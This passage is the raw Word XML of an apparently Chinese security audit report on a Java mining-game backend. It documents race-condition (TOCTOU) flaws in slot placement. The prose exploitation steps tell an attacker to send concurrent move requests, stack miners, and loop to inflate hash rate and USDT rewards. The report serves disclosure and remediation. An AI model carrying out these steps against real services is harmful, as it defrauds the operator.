          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>坑位 2 有矿机 B（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>坑位 3 已解锁、为空</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>仓库中存有若干高级别矿机（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="548"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>发起并发攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用脚本工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>curl --parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等）同时发送上述两个请求，将矿机 A 和矿机 B 都移向坑位 3。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="549"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若竞态触发：坑位 1 和坑位 2 均变为空，坑位 3 存在矿机 A 和矿机 B 两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>利用释放的坑位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：调用取矿机出仓库接口（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），将仓库中高级别矿机分别放入现已空出的坑位 1 和坑位 2。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>净效果：原来 1 个空坑位（坑位 3）→ 操作后 2 个空坑位（1 和 2），同时 1 个坑位（坑位 3）承载 2 台矿机。净释放 1 个额外坑位容量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重复循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：以释放出的空坑位为新的目标坑位，继续对步骤 2-3 迭代。每次循环额外释放 1 个坑位容量，最终可将大量仓库矿机激活至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="553"/>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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对叠放于同一坑位的两台矿机各自独立计算算力并累加，用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 远超正常上限；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若叠放的矿机等级高于当前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，还将触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 批量补发 USDT 奖励（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>fromLevel = oldLevel+1, toLevel = userNewLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="556"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>后续收益结算周期中，超额算力持续带来非法收益。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：普通用户（无需任何特殊权限，攻击者只需一个合法的注册账号）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>资金影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：超额算力导致游戏收益超出设计上限，且触发等级跳升时 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会累计发放对应区间的 USDT 余额至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_account.usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，构成直接资金损失；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>间接影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService.claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可能额外发放金币、电力、矿机、加速卡等道具，进一步放大经济破坏面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 1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受影响调用链（2 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.move → MinerService.java.moveToSlot → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.move → MinerService.java.moveToSlot → MinerService.java.canPlaceInSlot → MinerService.java.isSlotUnlocked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audit_m153_512_move_ctrl-path1of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m153_537_move_ctrl-path4of6.md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：MinerService.java#moveToSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_26" w:id="26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞25：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中坑位占用检查与写入非原子性（TOCTOU）导致矿机超限部署、算力虚增</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="56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moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOCTOU 竞态条件绕过坑位上限，可无限叠加矿机与虚增算力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="56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src/main/java/com/gameBack/mjservice/service/MinerService.java:moveToSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="56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 资金安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="56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56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moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在执行坑位占用检查（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）与实际写入目标坑位（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）之间存在经典的 TOCTOU（Time-Of-Check Time-Of-Use）竞态窗口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="570"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">方法上的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 MySQL 默认的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Repeatable Read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 隔离级别，此隔离级别对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（普通读）使用快照（consistent snapshot），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不加行锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内部的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorage</w:t>
